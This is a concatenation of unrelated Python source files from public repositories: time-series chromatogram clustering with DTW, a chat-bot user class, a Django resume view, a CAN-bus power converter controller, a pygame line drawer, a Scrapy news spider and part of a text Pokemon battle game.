0\n raw_len = []\n smooth_len = []\n\n for u in range(U):\n raw_row = self.raw[u]\n smooth_row = self.chromatogram[u]\n\n last_raw = raw_row[0]\n last_smooth = smooth_row[0]\n max_len_raw = 1\n max_len_smooth = 1\n\n for i in range(1, len(raw_row)):\n curr_raw = raw_row[i]\n curr_smooth = smooth_row[i]\n if curr_raw == 0:\n break\n\n if curr_raw != last_raw:\n raw_changes += 1\n\n raw_len.append(max_len_raw)\n max_len_raw = 1\n else:\n max_len_raw += 1\n\n if curr_smooth != last_smooth:\n smooth_changes += 1\n\n smooth_len.append(max_len_smooth)\n max_len_smooth = 1\n else:\n max_len_smooth += 1 \n\n last_raw = curr_raw\n last_smooth = curr_smooth\n\n self.d_raw = raw_changes / U\n self.d_smooth = smooth_changes / U\n\n print(\"SMOOTHING STATS: Δ_raw={}, Δ_smooth={}, ratio={:.4f}\".format(raw_changes, smooth_changes, raw_changes / 
smooth_changes))\n print(\"CW LENGTH STATS: μ_raw ={:.4f}, σ_raw ={:.4f}\\n μ_smooth={:.4f}, σ_smooth={:.4f}\"\\\n .format(np.mean(raw_len), np.std(raw_len), \n np.mean(smooth_len), np.std(smooth_len)))\n\n def reorder_colors(self):\n len_stats = self.get_length_stats()\n\n means = [len_stats[i][0] for i in range(1, self.codebook.K+1)]\n print(\"Bandwidth means: {}\".format(means))\n order = np.argsort(means)[::-1]\n order = list(order)\n def reorder(x):\n x = int(x)\n if x == 0:\n return 0\n return order.index(x-1) + 1\n\n self.reorder_colors = np.vectorize(reorder)\n self.codebook.reorder_colors = np.vectorize(reorder)\n\n print(\"New color order: {}\".format(order))\n self.color_order = order\n\n # How to cluster users in the chromatogram\n # - 'freqs': clusters users based on their codeword frequency vectors\n # - 'logfreqs': clusters users based on the log of their codeword frequency vectors\n # - 'markov': clusters users based on their codeword transition matrix\n # - 'width': clusters users based on their bandwidth mean and stddevs\n def segment_users(self, on='freqs'):\n if on =='freqs':\n freqs = self.get_freqs_per_user()\n\n elif on == 'logfreqs':\n freqs = self.get_freqs_per_user()\n freqs = np.log(freqs + 1e-12)\n\n elif on == 'markov':\n K = self.codebook.K\n U = len(self.users)\n markov = self.get_markov_model()\n\n freqs = np.zeros((U, K*K))\n\n for i in range(U):\n freqs[i] = markov[self.users[i]].flatten()\n\n elif on == 'width':\n freqs = self.get_freqs_per_user()\n len_per_user = self.get_lengths_per_user()\n\n K = self.codebook.K\n U = len(self.users)\n lengths = np.zeros((U, 2*K))\n\n for i in range(U):\n u = self.users[i]\n for k, l in len_per_user[u].items():\n if len(l) > 0:\n l = np.array(l)\n lmin = np.min(l)\n lmax = np.max(l)\n\n if lmax == lmin:\n lengths[i, k-1] = np.mean(l) - lmin\n else:\n lengths[i, k-1] = (np.mean(l) - lmin) / (lmax - lmin)\n\n else:\n lengths[i, k-1] = 0\n\n else:\n print(\"Unknown parameter {}\".format(on))\n\n ordering = self.duo_cluster(freqs, np.array(self.users), 0)\n \n self.users = list(ordering)\n print(\"New ordering: \", ordering)\n\n idx = np.argsort(np.argsort(ordering))\n\n self.clustered = True\n self.chromatogram = self.chromatogram[idx]\n self.raw = self.raw[idx]\n\n def get_freq_diff(self, u1, u2):\n freqs = self.get_freqs_per_user(ax=1)\n diff = freqs[u1].mean(axis=0) - freqs[u2].mean(axis=0)\n self._freq_diff = diff\n self.freq_diff = abs(diff)\n\n # Recursive clustering method\n def duo_cluster(self, cbf, group, level):\n tabs = \"\"\n t = level\n while t > 0:\n tabs = tabs + \"\\t\"\n t = t - 1\n \n print(tabs, group.shape[0], \"USERS\", group)\n if group.shape[0] <= 2:\n return group\n \n CF = linkage(cbf, method='complete', metric=\"euclidean\")\n clusters = fcluster(CF, 2, criterion='maxclust')\n g1 = np.where(clusters == 1)\n g2 = np.where(clusters == 2)\n if len(g1[0]) == len(group):\n return group\n \n u1 = group[g1]\n u2 = group[g2]\n\n if level == 0:\n self.get_freq_diff(g1, g2)\n\n cbf1 = cbf[g1]\n cbf2 = cbf[g2]\n\n return np.concatenate(np.array([self.duo_cluster(cbf1, u1, level + 1), \n self.duo_cluster(cbf2, u2, level+1)]))\n\n\n def get_codeword_distribution(self):\n dist = {i+1: 0 for i in range(self.codebook.K)}\n\n for row in self.chromatogram:\n for cw in row:\n cw = int(cw)\n if cw == 0:\n break\n dist[cw] += 1\n\n total = sum(dist.values())\n\n for cw in dist.keys():\n dist[cw] /= total\n\n return dist\n\n\n ###########################\n # CHROMATOGRAM STATISTICS #\n ###########################\n\n 
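# get_length_stats: per-codeword (mean, std) of contiguous codeword run lengths across the chromatogram rows\n    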
def get_length_stats(self):\n len_dict = self.get_codeword_length_distribution()\n stats = {i+1: [] for i in range(self.codebook.K)}\n\n for cw, lens in len_dict.items():\n if len(lens) > 0:\n stats[cw] = (np.mean(lens), np.std(lens))\n else:\n stats[cw] = (0, 0)\n return stats\n\n def get_codeword_length_distribution(self):\n lengths = {i+1: [] for i in range(self.codebook.K)}\n\n K = self.codebook.K\n\n for i in range(len(self.mts.users)):\n row = self.chromatogram[i]\n\n last_cw = int(row[0])\n max_len = 1\n for j in range(1, len(row)):\n if row[j] == 0:\n break\n\n curr_cw = int(row[j])\n\n if curr_cw == last_cw:\n max_len += 1\n else:\n lengths[last_cw].append(max_len)\n max_len = 1\n\n last_cw = curr_cw\n\n return lengths\n\n def get_lengths_per_user(self):\n users = self.users\n K = self.codebook.K\n\n len_per_user = {}\n\n for i in range(len(users)):\n len_per_cw = {i+1: [] for i in range(K)}\n\n row = self.chromatogram[i]\n\n last_cw = int(row[0])\n max_len = 1\n for j in range(1, len(row)):\n if row[j] == 0:\n break\n\n curr_cw = int(row[j])\n\n if curr_cw == last_cw:\n max_len += 1\n else:\n len_per_cw[last_cw].append(max_len)\n max_len = 1\n\n last_cw = curr_cw\n\n len_per_user[users[i]] = len_per_cw\n\n return len_per_user\n\n def get_markov_model(self):\n markov = {}\n\n K = self.codebook.K\n users = self.users\n\n for i in range(len(users)):\n transition_matrix = np.zeros((K, K))\n row = self.chromatogram[i]\n\n for j in range(len(row) - 1):\n if row[j+1] == 0:\n break\n\n curr_cw = int(row[j]) - 1\n next_cw = int(row[j+1]) -1\n transition_matrix[curr_cw, next_cw] += 1\n\n row_sums = transition_matrix.sum(axis=1) + 1e-12\n transition_matrix = transition_matrix / row_sums[:, np.newaxis]\n markov[users[i]] = transition_matrix\n\n return markov\n\n def get_freqs_per_user(self, ax=1):\n K = self.codebook.K\n U = len(self.users)\n freqs = np.zeros((U, K))\n\n for i in range(U):\n row = self.chromatogram[i]\n\n for j in range(len(row)):\n cw = int(row[j])\n if cw == 0:\n break\n else:\n freqs[i, cw - 1] += 1\n\n sums = freqs.sum(axis=ax) + 1e-12\n if ax == 1:\n freqs = freqs / sums[:, np.newaxis]\n else:\n freqs = freqs / sums[np.newaxis, :]\n return freqs\n\n def visualize(self, users=None):\n if users:\n visualization.plot_chromatogram(self, users)\n else:\n visualization.plot_chromatogram(self, self.users)\n\n def plot_user(self, user, sigma=3, ylim=None):\n visualization.plot_user(self, user, sigma, ylim)\n\n def plot_freq_diff(self):\n visualization.plot_freq_diff(self)\n\n############\n# SAMPLING #\n############\n\ndef subsequences(a, L):\n n, m = a.shape\n windows = int(m/L) \n window_range = np.linspace(0, windows-1, (windows-1) * 2 + 1)\n ss = []\n for x in window_range:\n ss.append(a[:, int(x*L):int((x+1)*L)])\n return np.array(ss)\n\ndef extract_samples(umts, L):\n sss = np.array([])\n bounds = [0]\n for u in umts: \n mts = umts[u]\n ss = subsequences(mts, L)\n bounds.append(bounds[-1] + ss.shape[0])\n if sss.shape[0] == 0:\n sss = ss\n else:\n sss = np.concatenate((sss, ss))\n word_shape = sss.shape[-2:]\n sss = sss.reshape(sss.shape[0], -1)\n return sss, bounds, word_shape\n\ndef sample_sss(A, n):\n return A[np.random.choice(A.shape[0], n, replace=False), :]\n\n\ndef sample_kcenters(words, kcenters, dist_metric, cull_threshold=100): \n if len(words) <= 1: \n return np.array(kcenters)\n\n sys.stdout.write(\"\\033[K\")\n print(\"Sampling ... 
(words: {}, centers: {})\".format(words.shape[0], len(kcenters)), end='\\r')\n \n n = words.shape[0]\n dist = [dist_metric(kcenters[-1], words[i]) for i in range(0, n)]\n dists = np.array(dist)\n \n idx = np.argsort(dists)\n kcenters.append(words[idx[-1]]) \n dists = np.sort(dists)\n cull_at = np.argmax(dists>cull_threshold)\n \n cull_indices = idx[:cull_at]\n cull_indices = np.append(cull_indices, idx[-1])\n words = np.delete(words, cull_indices, 0)\n \n return np.array(sample_kcenters(words, kcenters, dist_metric, cull_threshold))\n\n####################\n# DISTANCE METRICS #\n####################\n\ndef EuclideanDistance(t1, t2):\n return np.sqrt(np.sum((t1-t2)**2))\n\n# Dynamic Time Warping Distance\ndef DTWDistance(s1, s2):\n # Initialize distance matrix (nxn), pad filling with inf \n DTW= {}\n n1 = range(len(s1))\n n2 = range(len(s2))\n for i in n1:\n DTW[(i, -1)] = float('inf')\n for i in n2:\n DTW[(-1, i)] = float('inf')\n DTW[(-1, -1)] = 0\n \n # Compute the distances (O(nm) time)\n for i in n1:\n for j in n2:\n dist = (s1[i]-s2[j])**2\n DTW[(i, j)] = dist + min(DTW[(i-1, j)], DTW[(i, j-1)], DTW[(i-1, j-1)])\n return np.sqrt(DTW[len(s1)-1, len(s2)-1])\n\ndef DTWDistanceD(t1, t2):\n arr = []\n for i in range(0, t1.shape[0]):\n arr.append(DTWDistance(t1[i], t2[i]))\n return sum(arr)\n\ndef DTWDistance2D(t1, t2):\n t1 = t1.reshape(WORD_SHAPE)\n t2 = t2.reshape(WORD_SHAPE)\n arr = []\n for i in range(0, t1.shape[0]):\n arr.append(DTWDistance(t1[i], t2[i]))\n return sum(arr)\n\ndef dtw2(a, b, word_shape):\n a = a.reshape(word_shape)\n b = b.reshape(word_shape)\n return tsm.dtw(a, b)\n\ndef make_multivariate_dtw(word_shape):\n def dtw(a, b):\n a = a.reshape(word_shape)\n b = b.reshape(word_shape)\n return tsm.dtw(a, b)\n return dtw\n\n###########################\n# CHROMATOGRAPHY FUNCTION #\n###########################\n\ndef distill(mts_df, window_size, cull_threshold, K, return_meta=False):\n # Reformat MTS from pandas df to dict user --> matrix\n mts, users, features = df2mts(mts_df)\n\n # Compute sample width\n L = time2L(users, mts, window_size)\n\n # Extract all sequence from MTS\n sss, bounds, word_shape = extract_samples(mts, L)\n N = sss.shape[0]\n print(\"Extracted N={} sequences with shape (F={}, L={})\".format(N, word_shape[0], word_shape[1]))\n print(\"--------------------------------------------------\")\n\n # Sample using greedy k-centers clustering\n first_center = random.randint(0, N)\n first_center = N // 2\n seed = sss[first_center]\n code_sample = np.delete(sss, first_center, 0)\n\n # Construct distance metric\n dtw = make_multivariate_dtw(word_shape)\n\n samples = sample_kcenters(code_sample, [seed], dtw, cull_threshold)\n M = samples.shape[0]\n print('Sampled M={} codewords, {:.2f}%% of original N={} sequences'.format(M, (M / N) * 100, N))\n print(\"--------------------------------------------------\")\n\n # Hierarchical clustering and pruning\n linkage_matrix = linkage(samples, method='complete', metric=dtw)\n clusters = fcluster(linkage_matrix, K, criterion='maxclust')\n\n # Codeword extraction\n codebook = {}\n for i in range(len(clusters)):\n cluster_id = clusters[i]\n if not cluster_id in codebook:\n codebook[cluster_id] = []\n codebook[cluster_id].append(samples[i])\n\n # Computer centroid\n for k in codebook:\n codeset = np.array(codebook[k])\n dist = np.sum(squareform(distance.pdist(codeset, metric=dtw)), 0)\n clustroid = np.argmin(dist)\n codebook[k] = codeset[clustroid]\n\n print('Extracted {} codewords'.format(K))\n\n meta = {\n \"L\": L,\n 
\"window_size\": window_size,\n \"bounds\": bounds,\n \"word_shape\": word_shape,\n \"users\": users, \n \"features\": features, \n \"subsequences\": sss.tolist(),\n \"linkage_matrix\": linkage_matrix.tolist()\n }\n\n if return_meta:\n return codebook, meta\n else:\n return codebook\n\ndef apply(codebook, mts_df, window_size, smoothing_window=None):\n mts, users, features = df2mts(mts_df)\n # Compute sample width\n L = time2L(users, mts, window_size)\n\n sss, bounds, word_shape = extract_samples(mts, L)\n dtw = make_multivariate_dtw(word_shape)\n\n results = []\n for i, window in enumerate(sss):\n codeword = np.argmin([dtw(codeword, window) for codeword in codebook.values()])\n results.append(codeword + 1)\n\n sizes = []\n for i in range(len(bounds)-1):\n start = bounds[i]\n end = bounds[i+1]\n sizes.append(end-start)\n tn = max(sizes)\n\n chromatogram = np.zeros((len(bounds) - 1, tn))\n\n for i in range(len(sizes)):\n data = np.array(results[bounds[i]:bounds[i+1]])\n if smoothing_window:\n raise NotImplementedError\n return None\n else:\n chromatogram[i, :sizes[i]] = data\n\n return chromatogram\n\n","repo_name":"Hybrid-Ecologies/eluent","sub_path":"eluent/activity.py","file_name":"activity.py","file_ext":"py","file_size_in_byte":22971,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"76"} +{"seq_id":"34883023433","text":"from .http import post\n\n\nclass User:\n\n def __init__(self, bot, id_):\n self.bot = bot\n self.id = id_\n self._name = None\n self._messages_sent = None\n\n async def update(self):\n if not (self._name is None or self._messages_sent is None):\n return\n resp = await post(self.bot.session, \"/get_user\", data={\"id\": self.id})\n data = await resp.json()\n self._name = data[\"name\"]\n self._messages_sent = data[\"messages_sent\"]\n\n @property\n async def name(self):\n await self.update()\n return self._name\n\n @property\n async def messages_sent(self):\n await self.update()\n return self._messages_sent\n\n def __eq__(self, other):\n if not isinstance(other, User):\n return NotImplemented\n return self.id == other.id\n\n def __str__(self):\n if self._name:\n return self._name\n return repr(self)\n","repo_name":"LyricLy/capncord.py","sub_path":"capncord/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"14337841767","text":"from django.shortcuts import render_to_response\nfrom django.http import HttpResponse\nfrom django.template import RequestContext\nfrom django.template.loader import get_template\nfrom resume.models import *\n\nimport StringIO\nimport ho.pisa as pisa\nimport logging\n\nclass PisaNullHandler(logging.Handler):\n def emit(self, record):\n pass\n\nlogging.getLogger(\"ho.pisa\").addHandler(PisaNullHandler())\n\n\ndef index(request):\n try:\n ip = request.META['REMOTE_ADDR']\n visitor = Visitor.objects.all().filter(ipaddress=ip)\n if len(visitor) != 1:\n visitor = Visitor()\n visitor.ipaddress = ip\n visitor.save()\n else:\n visitor = visitor[0]\n visitor.visits += 1\n visitor.save()\n except:\n pass\n \n basic = BasicInformation.objects.all()\n if len(basic) != 1:\n raise Exception(\n 'Error: You must have exactly ONE BasicInformation object')\n basic = basic[0]\n degrees = Degree.objects.all().order_by('order')\n jobs = Job.objects.all().order_by('order')\n projects = Project.objects.all().order_by('order')\n skills = Skill.objects.all().order_by('order')\n extras = 
Extracurricular.objects.all().order_by('order')\n\n for job in jobs:\n job.dates = DateRange.objects.filter(job=job)\n for project in projects:\n project.dates = DateRange.objects.filter(project=project)\n for extra in extras:\n extra.dates = DateRange.objects.filter(extra=extra)\n \n pdf = False\n if request.method == \"GET\" and \"pdf\" in request.GET:\n pdf = True\n \n context = RequestContext(request, locals())\n template = get_template(\"index.html\")\n html = template.render(context)\n result = StringIO.StringIO()\n if pdf:\n pdf = pisa.pisaDocument(StringIO.StringIO(html.encode(\"UTF-8\")), result)\n response = HttpResponse(mimetype=\"application/pdf\")\n response['Content-Disposition'] = 'attachment; Resume.pdf'\n response.write(result.getvalue())\n return response\n\n return render_to_response('index.html', locals())\n\n\n","repo_name":"zachtib/resumeweb","sub_path":"resume/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"35029015106","text":"import can\nimport time\nimport select\nimport sys\n\nCONTROL_SEND = 0x159\nSTATUS_SEND = 0X15C\nACK_ID = 0x459\nSTATUS_ID = 0x45C\n\nclass Zeka:\n zeka_precharge_done = False\n zeka_fullstop_and_device_not_running = True\n zeka_read_voltage = 0\n zeka_read_current = 0\n old_current_set = 0\n\n def zeka_init(self, bus):\n print(\"Init\")\n msg = can.Message(arbitration_id=CONTROL_SEND, data=[0x80, 0x00, 0x04, 0x00, 0x03, 0xFF, 0xFF, 0xFF], is_extended_id=False)\n\n try:\n bus.send(msg)\n except can.CanError:\n print(\"Message not sent\")\n\n def zeka_start(self, bus):\n print(\"Start\")\n msg = can.Message(arbitration_id=CONTROL_SEND, data=[0x80, 0x01, 0x01, 0x00, 0x03, 0xFF, 0xFF, 0xFF], is_extended_id=False)\n\n try: \n bus.send(msg)\n except can.CanError:\n print(\"Message not sent\")\n\n def zeka_stop(self, bus):\n print(\"Stop\")\n msg = can.Message(arbitration_id=CONTROL_SEND, data=[0x80, 0x01, 0x04, 0x00, 0x03, 0xFF, 0xFF, 0xFF], is_extended_id=False)\n\n try:\n bus.send(msg)\n except can.CanError:\n print(\"Message not sent\")\n\n def zeka_set_voltage_current(self, bus, voltage, current):\n print(\"Set voltage and current\")\n voltage = int(voltage * 10)\n current = int(current * 10)\n a_to_b_ctrl = [0x83, voltage>>8, voltage & 0x00FF, current>>8, current & 0x00FF, 0xFF, 0xFF, 0xFF]\n msg = can.Message(arbitration_id=CONTROL_SEND, data=a_to_b_ctrl, is_extended_id=False)\n\n try:\n bus.send(msg)\n except can.CanError:\n print(\"Message not sent\")\n\n def zeka_main_status(self, bus):\n print(\"Main status\")\n msg = can.Message(arbitration_id=STATUS_SEND, data=[0xA0, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF], is_extended_id=False)\n\n try:\n bus.send(msg)\n print(f\"Message sent on {bus.channel_info}\")\n except can.CanError:\n print(\"Message not sent\")\n\n def zeka_feedback_status(self, bus):\n# print(\"Feedback status for side B\")\n msg = can.Message(arbitration_id=STATUS_SEND, data=[0xA2, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF], is_extended_id=False)\n\n try:\n bus.send(msg)\n except can.CanError:\n print(\"Message not sent\")\n\n def zeka_receive(self, bus):\n msg = bus.recv()\n\n if msg.arbitration_id == ACK_ID:\n if msg.data[0] == 0x80:\n zeka_prev_msg = 0x80\n elif msg.data[0] == 0x83:\n zeka_prev_msg = 0x83\n\n elif msg.arbitration_id == STATUS_ID:\n if msg.data[0] == 0xA0:\n if (msg.data[2] & 0b00000011) == 0b000:\n self.zeka_precharge_done = True\n else:\n self.zeka_precharge_done = 
False\n\n if (msg.data[2] & 0b01000100) == 0b01000000:\n self.zeka_fullstop_and_device_not_running = True\n else:\n self.zeka_fullstop_and_device_not_running = False\n\n zeka_prev_msg = 0xA0\n\n if msg.data[0] == 0xA2:\n self.zeka_read_voltage = ((msg.data[1]<<8) | msg.data[2]) * 0.1 # 0.1V\n self.zeka_read_current = ((msg.data[3]<<8) | msg.data[4]) * 0.1 # 0.1A\n\n zeka_prev_msg = 0xA2\n\n def controller(self, bus, v_set, c_set):\n current_set = 0\n if self.zeka_read_voltage > v_set and self.zeka_read_voltage < v_set + 5:\n current_set = c_set\n elif self.zeka_read_voltage > v_set + 5:\n current_set = c_set - 0.1\n elif self.zeka_read_voltage > v_set - 5 and self.zeka_read_voltage < v_set:\n current_set = c_set + 0.1\n elif self.zeka_read_voltage < v_set - 5:\n current_set = c_set + 0.2\n\n if current_set != self.old_current_set:\n self.zeka_set_voltage_current(bus, v_set + 50, current_set)\n self.zeka_receive(bus)\n\n self.old_current_set = current_set\n\nif __name__ == \"__main__\":\n manual = False\n\n bus = can.interface.Bus(bustype='slcan', channel='/dev/ttyACM0', bitrate=500000)\n zeka_obj = Zeka()\n\n zeka_obj.zeka_init(bus)\n zeka_obj.zeka_receive(bus)\n while not zeka_obj.zeka_precharge_done:\n zeka_obj.zeka_main_status(bus)\n zeka_obj.zeka_receive(bus)\n time.sleep(1)\n zeka_obj.zeka_set_voltage_current(bus, 550, 3)\n zeka_obj.zeka_receive(bus)\n zeka_obj.zeka_start(bus)\n zeka_obj.zeka_receive(bus)\n\n current_set = 3.0\n while True:\n zeka_obj.zeka_feedback_status(bus)\n zeka_obj.zeka_receive(bus)\n time.sleep(0.5)\n if manual and sys.stdin in select.select([sys.stdin], [], [], 0)[0]:\n line = sys.stdin.readline()\n if line:\n tmp = line.strip().split(\" \")\n current = float(tmp[0])\n voltage = float(tmp[1])\n zeka_obj.zeka_set_voltage_current(bus, voltage, current)\n zeka_obj.zeka_receive(bus)\n else:\n if sys.stdin in select.select([sys.stdin], [], [], 0)[0]:\n line = sys.stdin.readline()\n if line:\n current_set = float(line.strip())\n zeka_obj.controller(bus, 500, current_set)\n else:\n zeka_obj.controller(bus, 500, current_set)\n\n zeka_obj.zeka_stop(bus)\n","repo_name":"lindawang6/aps490","sub_path":"zeka.py","file_name":"zeka.py","file_ext":"py","file_size_in_byte":5430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71007213045","text":"from convencional import convencional\nimport pygame\n\n\n# classe da interface de desenho\nclass InterfaceDesenho:\n def __init__(self) -> None:\n # iniciando a janela\n self.janela = pygame.display.set_mode((640, 480)) #tamanho da Janela\n pygame.display.set_caption(\"Linhas Convencionais\")\n\n # lista de pontos para desenhar, inclui os pontos já desenhados\n # e inclui os pontos que estão sendo desenhados\n pontos = []\n\n posicao_inicial = None\n posicao_atual = None\n\n # variável para indicar se deve fazer a linha em tempo real ou não\n desenhando = False\n\n # loop infinito para verificar de alguém estpa tentando desenhar\n while True:\n # loop pela lista de eventos\n for event in pygame.event.get():\n # se o evento foi de saída, fechar a janela\n if event.type == pygame.QUIT:\n pygame.quit()\n exit(1)\n \n #preenchendo a janela apenas com braco no fundo\n self.janela.fill((255, 255, 255))\n\n #pegando a posição inicial quando o mouse é pressionado\n if any(pygame.mouse.get_pressed()) and desenhando is False:\n #retorno da posição de quando foi pressionado\n posicao_inicial = pygame.mouse.get_pos() \n # agora pode desenhar\n desenhando = True\n\n #desenhando o linha 
vermelha de posição\n if desenhando is True:\n posicao_atual = pygame.mouse.get_pos()\n convencional(self.janela, (0,0,255), posicao_inicial, posicao_atual) \n\n #salvando os pixels de posição inicial e final da reta\n if not any(pygame.mouse.get_pressed()) and desenhando is True:\n posicao_atual = pygame.mouse.get_pos()\n pontos.append((posicao_inicial, posicao_atual))\n desenhando = False\n \n # traçando as retas já feitas\n for i in range(len(pontos)):\n convencional(self.janela, (0,0,0), pontos[i][0], pontos[i][1]) \n\n pygame.display.flip()\n\n\njanela = InterfaceDesenho()","repo_name":"GuiBatalhoti/projeto_cg","sub_path":"linhas/convencional/interface_desenho.py","file_name":"interface_desenho.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6390269126","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom datetime import datetime\nimport json\nfrom string import Template\nclass NewsSpider(CrawlSpider):\n name = 'newsspider'\n page_number = 1\n\n def __init__(self, *args, **kwargs):\n self.url = kwargs.get('url')\n self.domain = kwargs.get('domain')\n self.settingXpath = kwargs.get('xpath')\n self.start_urls = [self.url]\n self.url = self.start_urls[0]\n temp = kwargs.get('config')\n self.config = json.loads(temp)\n page_number = 1\n def start_request(self):\n yield scrapy.Request(self.url, self.parse)\n\n def parse(self, response):\n\n for i in range(self.config['pageconfig']['numberpage']):\n \n template = Template(self.config['pageconfig']['pageurltemplate'])\n urlPage = template.substitute(page=str(self.page_number))\n self.page_number += 1\n yield scrapy.Request(urlPage, callback=self.crawlDataTotalPage)\n \n def crawlDataTotalPage(self, response):\n configCss = self.config['newsconfig']['cssselector']\n allDiv = response.css(configCss['allpost'])\n for news in allDiv:\n link = news.css(configCss['link']).extract()\n imageLink = news.css(configCss['imagelink']).extract()[0]\n title = news.css(configCss['title']).extract()[0]\n description = ''.join(news.css(configCss['description']).extract()).lstrip().rstrip()\n yield{\n 'link' : 'https://'+self.domain+link[0],\n 'imageLink' : imageLink,\n 'title' : title,\n 'description' : description,\n 'domain' : self.domain\n }\n","repo_name":"fibonacci998/AnalysisAndCrawlService","sub_path":"scrapy_app/scrapy_app/spiders/newsspider.py","file_name":"newsspider.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38160449628","text":"import random\nimport bad\nfrom commands import cs as cs\nimport pokemonList\nimport pokemonart\nimport moves\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKCYAN = '\\033[36m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n\nwhile True:\n print(bcolors.WARNING + bcolors.BOLD + \"List of pokemon: \" + bcolors.ENDC)\n print(bcolors.OKGREEN + \"\\ncharmander\\nbulbasaur\\nsquirtle\\n \" + bcolors.ENDC)\n pokemon = input(\"Input your pokemon's name: \").lower()\n try:\n pk = pokemonList.pokemons[pokemon]\n break\n except:\n print(bcolors.FAIL + \"That's not a pokemon you dumbass.\" + bcolors.ENDC)\n\n\nprint(bcolors.OKBLUE + bcolors.BOLD + bcolors.UNDERLINE + \"\\n\" + str(pk[pokemon]) + \", i choose 
you!\\n\" + bcolors.ENDC)\npika = pokemonart.art[pokemon]\n\n\nprint(pika)\n\ntbDelay = 0\n\n\nhealth = pk['health']\npp = pk['pp']\ndefense = pk['baseDef']\n\nehealth = 100\nepp = 100\nedefense = 5\n\nenemyMissTurn = 0\nmissTurn = 0\n\nhealth = moves.scratch(health)\n\nattacks = [pk['move1']['name'], pk['move2']['name'], 'PP drain', pk['move4']['name']]\n\ndef makeScreen():\n input('Press Enter to continue!')\n cs()\n print(pika)\n\ndef message(msg, color):\n a = ''\n for i in range(len(msg)):\n a += ('-')\n \n print(\"\"\"{2}\n |{0}|\n |{1}|\n |{0}|\n {3}\"\"\".format(a, msg, color, bcolors.ENDC))\n\n \ndef printStats():\n message('Health: ' + str(health) + ' Pp: ' + str(pp) + ' Defense: ' + str(defense), bcolors.OKGREEN)\n message('Enemy health: ' + str(ehealth) + ' Enemy pp: ' + str(epp) + ' Enemy defense: ' + str(edefense), bcolors.OKGREEN)\n \n\nprintStats()\n\ndef checkHealth():\n global ehealth\n global health\n\n if(ehealth <= 0):\n message('You win, good job.', bcolors.BOLD + bcolors.WARNING)\n exit()\n elif(health <= 0):\n message(\"Fkn dumbass, lost to a rolling dice.\", bcolors.FAIL)\n exit()\n\n\ndef atk():\n global epp\n global ehealth\n global edefense\n global enemyMissTurn\n global missTurn\n global pp\n global tbDelay\n\n\n atks = attacks[0] + ' - ' + attacks[1] + ' - ' + attacks[2] + ' - ' + attacks[3]\n message(atks, bcolors.WARNING)\n atek = input('select attack 1/2/3/4 : ')\n \n try:\n int(atek)\n except:\n print(bcolors.FAIL + bad.threat + bcolors.ENDC)\n atk()\n\n attack = int(atek)\n\n try:\n attacks[attack -1]\n except:\n print('\\n' + bcolors.FAIL + bad.threat + bcolors.ENDC)\n atk()\n\n if(not missTurn):\n if(attack == 1):\n ehealth -= round(10 / edefense, 0)\n message(pokemon + \" used {0}, it did {1} damage!\".format(attacks[0], round(10/edefense,0)), bcolors.OKBLUE)\n elif(attack == 2):\n if(pp >= 5):\n pp -= 5\n if(random.randint(1,4) == 4):\n enemyMissTurn = 1\n message(pokemon + \" used {0}, the enemy was confused!\".format(attacks[1]), bcolors.OKBLUE)\n else:\n message(pokemon + ' used {0}, the enemy is not confused!'.format(attacks[1]), bcolors.OKBLUE)\n else:\n message(pokemon + \" doesn't have enough pp!\", bcolors.OKBLUE)\n elif(attack == 3):\n drain = random.randint(5,20)\n epp -= drain\n pp += drain\n message(pokemon + \" used {0}, you drained {1} mana!\".format(attacks[2], drain), bcolors.OKBLUE)\n elif(attack == 4):\n if(pp >= 10):\n if(tbDelay == 0):\n tbDelay = 3\n pp -= 10\n dmg = random.randint(1,3)\n ehealth -= round(20*dmg / edefense, 0)\n message(pokemon + \" used {0}, you did {1} damage!\".format(attacks[3], round(20*dmg/edefense,0)), bcolors.OKBLUE)\n if(random.randint(0,1) == 1 and edefense > 1):\n edefense -= 1\n else:\n message('Thunderbolt has a cooldown of 3 rounds, you have {0} left!'.format(tbDelay), bcolors.FAIL)\n atk()\n else:\n message(pokemon + \" doesn't have enough pp!\", bcolors.FAIL)\n atk()\n else:\n message(pokemon + \" was confused, it did no damage.\", bcolors.FAIL)\n missTurn = 0\n\n if(tbDelay > 0):\n tbDelay -= 1\n checkHealth()\n eatk()\n\npossible_moves = [1,2,3,4]\ndef eatk():\n global pp\n global health\n global defense\n global enemyMissTurn\n global missTurn\n global epp\n global possible_moves\n\n if(epp < 5 or pp <= 0 ):\n if(2 in possible_moves): possible_moves.remove(2)\n elif(2 not in possible_moves):\n possible_moves.append(2)\n if(epp < 10 and 4 in possible_moves):\n possible_moves.remove(4)\n elif(4 not in possible_moves):\n possible_moves.append(4)\n\n attack = random.choice(possible_moves)\n\n 
